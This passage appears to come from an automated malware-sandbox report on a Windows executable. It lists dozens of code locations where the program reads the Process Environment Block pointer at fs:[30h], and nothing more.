            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160E5E7 mov eax, dword ptr fs:[00000030h]4_2_0160E5E7
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161C5ED mov eax, dword ptr fs:[00000030h]4_2_0161C5ED
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161C5ED mov eax, dword ptr fs:[00000030h]4_2_0161C5ED
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E65D0 mov eax, dword ptr fs:[00000030h]4_2_015E65D0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161E5CF mov eax, dword ptr fs:[00000030h]4_2_0161E5CF
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161E5CF mov eax, dword ptr fs:[00000030h]4_2_0161E5CF
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161A5D0 mov eax, dword ptr fs:[00000030h]4_2_0161A5D0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161A5D0 mov eax, dword ptr fs:[00000030h]4_2_0161A5D0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E25E0 mov eax, dword ptr fs:[00000030h]4_2_015E25E0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016605A7 mov eax, dword ptr fs:[00000030h]4_2_016605A7
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016605A7 mov eax, dword ptr fs:[00000030h]4_2_016605A7
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016605A7 mov eax, dword ptr fs:[00000030h]4_2_016605A7
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016045B1 mov eax, dword ptr fs:[00000030h]4_2_016045B1
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016045B1 mov eax, dword ptr fs:[00000030h]4_2_016045B1
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E2582 mov eax, dword ptr fs:[00000030h]4_2_015E2582
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E2582 mov ecx, dword ptr fs:[00000030h]4_2_015E2582
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01614588 mov eax, dword ptr fs:[00000030h]4_2_01614588
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161E59C mov eax, dword ptr fs:[00000030h]4_2_0161E59C
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015D645D mov eax, dword ptr fs:[00000030h]4_2_015D645D
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0166C460 mov ecx, dword ptr fs:[00000030h]4_2_0166C460
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160A470 mov eax, dword ptr fs:[00000030h]4_2_0160A470
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160A470 mov eax, dword ptr fs:[00000030h]4_2_0160A470
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160A470 mov eax, dword ptr fs:[00000030h]4_2_0160A470
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161E443 mov eax, dword ptr fs:[00000030h]4_2_0161E443
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161E443 mov eax, dword ptr fs:[00000030h]4_2_0161E443
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161E443 mov eax, dword ptr fs:[00000030h]4_2_0161E443
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161E443 mov eax, dword ptr fs:[00000030h]4_2_0161E443
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161E443 mov eax, dword ptr fs:[00000030h]4_2_0161E443
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161E443 mov eax, dword ptr fs:[00000030h]4_2_0161E443
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161E443 mov eax, dword ptr fs:[00000030h]4_2_0161E443
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161E443 mov eax, dword ptr fs:[00000030h]4_2_0161E443
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160245A mov eax, dword ptr fs:[00000030h]4_2_0160245A
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0169A456 mov eax, dword ptr fs:[00000030h]4_2_0169A456
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01666420 mov eax, dword ptr fs:[00000030h]4_2_01666420
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01666420 mov eax, dword ptr fs:[00000030h]4_2_01666420
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01666420 mov eax, dword ptr fs:[00000030h]4_2_01666420
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01666420 mov eax, dword ptr fs:[00000030h]4_2_01666420
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01666420 mov eax, dword ptr fs:[00000030h]4_2_01666420
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01666420 mov eax, dword ptr fs:[00000030h]4_2_01666420
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01666420 mov eax, dword ptr fs:[00000030h]4_2_01666420
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161A430 mov eax, dword ptr fs:[00000030h]4_2_0161A430
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01618402 mov eax, dword ptr fs:[00000030h]4_2_01618402
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01618402 mov eax, dword ptr fs:[00000030h]4_2_01618402
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01618402 mov eax, dword ptr fs:[00000030h]4_2_01618402
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015DC427 mov eax, dword ptr fs:[00000030h]4_2_015DC427
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015DE420 mov eax, dword ptr fs:[00000030h]4_2_015DE420
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015DE420 mov eax, dword ptr fs:[00000030h]4_2_015DE420
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015DE420 mov eax, dword ptr fs:[00000030h]4_2_015DE420
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E04E5 mov ecx, dword ptr fs:[00000030h]4_2_015E04E5
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016144B0 mov ecx, dword ptr fs:[00000030h]4_2_016144B0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0166A4B0 mov eax, dword ptr fs:[00000030h]4_2_0166A4B0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0169A49A mov eax, dword ptr fs:[00000030h]4_2_0169A49A
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E64AB mov eax, dword ptr fs:[00000030h]4_2_015E64AB
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E0750 mov eax, dword ptr fs:[00000030h]4_2_015E0750
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161674D mov esi, dword ptr fs:[00000030h]4_2_0161674D
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161674D mov eax, dword ptr fs:[00000030h]4_2_0161674D
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161674D mov eax, dword ptr fs:[00000030h]4_2_0161674D
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E8770 mov eax, dword ptr fs:[00000030h]4_2_015E8770
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F0770 mov eax, dword ptr fs:[00000030h]4_2_015F0770
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F0770 mov eax, dword ptr fs:[00000030h]4_2_015F0770
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F0770 mov eax, dword ptr fs:[00000030h]4_2_015F0770
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F0770 mov eax, dword ptr fs:[00000030h]4_2_015F0770
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F0770 mov eax, dword ptr fs:[00000030h]4_2_015F0770
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F0770 mov eax, dword ptr fs:[00000030h]4_2_015F0770
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F0770 mov eax, dword ptr fs:[00000030h]4_2_015F0770
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F0770 mov eax, dword ptr fs:[00000030h]4_2_015F0770
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F0770 mov eax, dword ptr fs:[00000030h]4_2_015F0770
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F0770 mov eax, dword ptr fs:[00000030h]4_2_015F0770
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F0770 mov eax, dword ptr fs:[00000030h]4_2_015F0770
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F0770 mov eax, dword ptr fs:[00000030h]4_2_015F0770
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01622750 mov eax, dword ptr fs:[00000030h]4_2_01622750
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01622750 mov eax, dword ptr fs:[00000030h]4_2_01622750
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01664755 mov eax, dword ptr fs:[00000030h]4_2_01664755
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0166E75D mov eax, dword ptr fs:[00000030h]4_2_0166E75D
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161C720 mov eax, dword ptr fs:[00000030h]4_2_0161C720
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161C720 mov eax, dword ptr fs:[00000030h]4_2_0161C720
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E0710 mov eax, dword ptr fs:[00000030h]4_2_015E0710
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0165C730 mov eax, dword ptr fs:[00000030h]4_2_0165C730
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161273C mov eax, dword ptr fs:[00000030h]4_2_0161273C
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161273C mov ecx, dword ptr fs:[00000030h]4_2_0161273C
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161273C mov eax, dword ptr fs:[00000030h]4_2_0161273C
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161C700 mov eax, dword ptr fs:[00000030h]4_2_0161C700
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01610710 mov eax, dword ptr fs:[00000030h]4_2_01610710
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0166E7E1 mov eax, dword ptr fs:[00000030h]4_2_0166E7E1
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016027ED mov eax, dword ptr fs:[00000030h]4_2_016027ED
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016027ED mov eax, dword ptr fs:[00000030h]4_2_016027ED
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016027ED mov eax, dword ptr fs:[00000030h]4_2_016027ED
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015EC7C0 mov eax, dword ptr fs:[00000030h]4_2_015EC7C0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E47FB mov eax, dword ptr fs:[00000030h]4_2_015E47FB
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E47FB mov eax, dword ptr fs:[00000030h]4_2_015E47FB
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016607C3 mov eax, dword ptr fs:[00000030h]4_2_016607C3
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016947A0 mov eax, dword ptr fs:[00000030h]4_2_016947A0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0168678E mov eax, dword ptr fs:[00000030h]4_2_0168678E
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E07AF mov eax, dword ptr fs:[00000030h]4_2_015E07AF
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161A660 mov eax, dword ptr fs:[00000030h]4_2_0161A660
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161A660 mov eax, dword ptr fs:[00000030h]4_2_0161A660
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016A866E mov eax, dword ptr fs:[00000030h]4_2_016A866E
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016A866E mov eax, dword ptr fs:[00000030h]4_2_016A866E
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01612674 mov eax, dword ptr fs:[00000030h]4_2_01612674
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015FC640 mov eax, dword ptr fs:[00000030h]4_2_015FC640
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01616620 mov eax, dword ptr fs:[00000030h]4_2_01616620
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01618620 mov eax, dword ptr fs:[00000030h]4_2_01618620
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F260B mov eax, dword ptr fs:[00000030h]4_2_015F260B
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F260B mov eax, dword ptr fs:[00000030h]4_2_015F260B
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F260B mov eax, dword ptr fs:[00000030h]4_2_015F260B
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F260B mov eax, dword ptr fs:[00000030h]4_2_015F260B
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F260B mov eax, dword ptr fs:[00000030h]4_2_015F260B
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F260B mov eax, dword ptr fs:[00000030h]4_2_015F260B
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F260B mov eax, dword ptr fs:[00000030h]4_2_015F260B
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0165E609 mov eax, dword ptr fs:[00000030h]4_2_0165E609
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E262C mov eax, dword ptr fs:[00000030h]4_2_015E262C
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015FE627 mov eax, dword ptr fs:[00000030h]4_2_015FE627
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01622619 mov eax, dword ptr fs:[00000030h]4_2_01622619
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0165E6F2 mov eax, dword ptr fs:[00000030h]4_2_0165E6F2
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0165E6F2 mov eax, dword ptr fs:[00000030h]4_2_0165E6F2
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0165E6F2 mov eax, dword ptr fs:[00000030h]4_2_0165E6F2
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0165E6F2 mov eax, dword ptr fs:[00000030h]4_2_0165E6F2
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016606F1 mov eax, dword ptr fs:[00000030h]4_2_016606F1
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016606F1 mov eax, dword ptr fs:[00000030h]4_2_016606F1
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161A6C7 mov ebx, dword ptr fs:[00000030h]4_2_0161A6C7
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161A6C7 mov eax, dword ptr fs:[00000030h]4_2_0161A6C7
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161C6A6 mov eax, dword ptr fs:[00000030h]4_2_0161C6A6
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E4690 mov eax, dword ptr fs:[00000030h]4_2_015E4690
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E4690 mov eax, dword ptr fs:[00000030h]4_2_015E4690
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016166B0 mov eax, dword ptr fs:[00000030h]4_2_016166B0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01606962 mov eax, dword ptr fs:[00000030h]4_2_01606962
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01606962 mov eax, dword ptr fs:[00000030h]4_2_01606962
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01606962 mov eax, dword ptr fs:[00000030h]4_2_01606962
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0162096E mov eax, dword ptr fs:[00000030h]4_2_0162096E
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0162096E mov edx, dword ptr fs:[00000030h]4_2_0162096E
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0162096E mov eax, dword ptr fs:[00000030h]4_2_0162096E
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01684978 mov eax, dword ptr fs:[00000030h]4_2_01684978
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01684978 mov eax, dword ptr fs:[00000030h]4_2_01684978
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0166C97C mov eax, dword ptr fs:[00000030h]4_2_0166C97C
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01660946 mov eax, dword ptr fs:[00000030h]4_2_01660946
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016B4940 mov eax, dword ptr fs:[00000030h]4_2_016B4940
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015D8918 mov eax, dword ptr fs:[00000030h]4_2_015D8918
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015D8918 mov eax, dword ptr fs:[00000030h]4_2_015D8918
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0166892A mov eax, dword ptr fs:[00000030h]4_2_0166892A
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0167892B mov eax, dword ptr fs:[00000030h]4_2_0167892B
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0165E908 mov eax, dword ptr fs:[00000030h]4_2_0165E908
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0165E908 mov eax, dword ptr fs:[00000030h]4_2_0165E908
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0166C912 mov eax, dword ptr fs:[00000030h]4_2_0166C912
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0166E9E0 mov eax, dword ptr fs:[00000030h]4_2_0166E9E0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015EA9D0 mov eax, dword ptr fs:[00000030h]4_2_015EA9D0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015EA9D0 mov eax, dword ptr fs:[00000030h]4_2_015EA9D0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015EA9D0 mov eax, dword ptr fs:[00000030h]4_2_015EA9D0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015EA9D0 mov eax, dword ptr fs:[00000030h]4_2_015EA9D0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015EA9D0 mov eax, dword ptr fs:[00000030h]4_2_015EA9D0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015EA9D0 mov eax, dword ptr fs:[00000030h]4_2_015EA9D0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016129F9 mov eax, dword ptr fs:[00000030h]4_2_016129F9
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016129F9 mov eax, dword ptr fs:[00000030h]4_2_016129F9
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016769C0 mov eax, dword ptr fs:[00000030h]4_2_016769C0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016149D0 mov eax, dword ptr fs:[00000030h]4_2_016149D0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016AA9D3 mov eax, dword ptr fs:[00000030h]4_2_016AA9D3
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016689B3 mov esi, dword ptr fs:[00000030h]4_2_016689B3
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016689B3 mov eax, dword ptr fs:[00000030h]4_2_016689B3
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016689B3 mov eax, dword ptr fs:[00000030h]4_2_016689B3
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E09AD mov eax, dword ptr fs:[00000030h]4_2_015E09AD
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E09AD mov eax, dword ptr fs:[00000030h]4_2_015E09AD
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F29A0 mov eax, dword ptr fs:[00000030h]4_2_015F29A0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F29A0 mov eax, dword ptr fs:[00000030h]4_2_015F29A0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F29A0 mov eax, dword ptr fs:[00000030h]4_2_015F29A0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F29A0 mov eax, dword ptr fs:[00000030h]4_2_015F29A0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F29A0 mov eax, dword ptr fs:[00000030h]4_2_015F29A0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F29A0 mov eax, dword ptr fs:[00000030h]4_2_015F29A0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F29A0 mov eax, dword ptr fs:[00000030h]4_2_015F29A0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F29A0 mov eax, dword ptr fs:[00000030h]4_2_015F29A0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F29A0 mov eax, dword ptr fs:[00000030h]4_2_015F29A0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F29A0 mov eax, dword ptr fs:[00000030h]4_2_015F29A0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F29A0 mov eax, dword ptr fs:[00000030h]4_2_015F29A0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F29A0 mov eax, dword ptr fs:[00000030h]4_2_015F29A0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F29A0 mov eax, dword ptr fs:[00000030h]4_2_015F29A0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E4859 mov eax, dword ptr fs:[00000030h]4_2_015E4859
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E4859 mov eax, dword ptr fs:[00000030h]4_2_015E4859
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0166E872 mov eax, dword ptr fs:[00000030h]4_2_0166E872
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0166E872 mov eax, dword ptr fs:[00000030h]4_2_0166E872
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01676870 mov eax, dword ptr fs:[00000030h]4_2_01676870
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01676870 mov eax, dword ptr fs:[00000030h]4_2_01676870
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F2840 mov ecx, dword ptr fs:[00000030h]4_2_015F2840
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01610854 mov eax, dword ptr fs:[00000030h]4_2_01610854
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161A830 mov eax, dword ptr fs:[00000030h]4_2_0161A830
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0168483A mov eax, dword ptr fs:[00000030h]4_2_0168483A
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0168483A mov eax, dword ptr fs:[00000030h]4_2_0168483A
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01602835 mov eax, dword ptr fs:[00000030h]4_2_01602835
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01602835 mov eax, dword ptr fs:[00000030h]4_2_01602835
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01602835 mov eax, dword ptr fs:[00000030h]4_2_01602835
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01602835 mov ecx, dword ptr fs:[00000030h]4_2_01602835
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01602835 mov eax, dword ptr fs:[00000030h]4_2_01602835
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01602835 mov eax, dword ptr fs:[00000030h]4_2_01602835
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0166C810 mov eax, dword ptr fs:[00000030h]4_2_0166C810
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016AA8E4 mov eax, dword ptr fs:[00000030h]4_2_016AA8E4
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161C8F9 mov eax, dword ptr fs:[00000030h]4_2_0161C8F9
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161C8F9 mov eax, dword ptr fs:[00000030h]4_2_0161C8F9
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160E8C0 mov eax, dword ptr fs:[00000030h]4_2_0160E8C0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016B08C0 mov eax, dword ptr fs:[00000030h]4_2_016B08C0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E0887 mov eax, dword ptr fs:[00000030h]4_2_015E0887
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0166C89D mov eax, dword ptr fs:[00000030h]4_2_0166C89D
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015D8B50 mov eax, dword ptr fs:[00000030h]4_2_015D8B50
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01694B4B mov eax, dword ptr fs:[00000030h]4_2_01694B4B
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01694B4B mov eax, dword ptr fs:[00000030h]4_2_01694B4B
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015DCB7E mov eax, dword ptr fs:[00000030h]4_2_015DCB7E
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01676B40 mov eax, dword ptr fs:[00000030h]4_2_01676B40
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01676B40 mov eax, dword ptr fs:[00000030h]4_2_01676B40
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016AAB40 mov eax, dword ptr fs:[00000030h]4_2_016AAB40
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01688B42 mov eax, dword ptr fs:[00000030h]4_2_01688B42
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0168EB50 mov eax, dword ptr fs:[00000030h]4_2_0168EB50
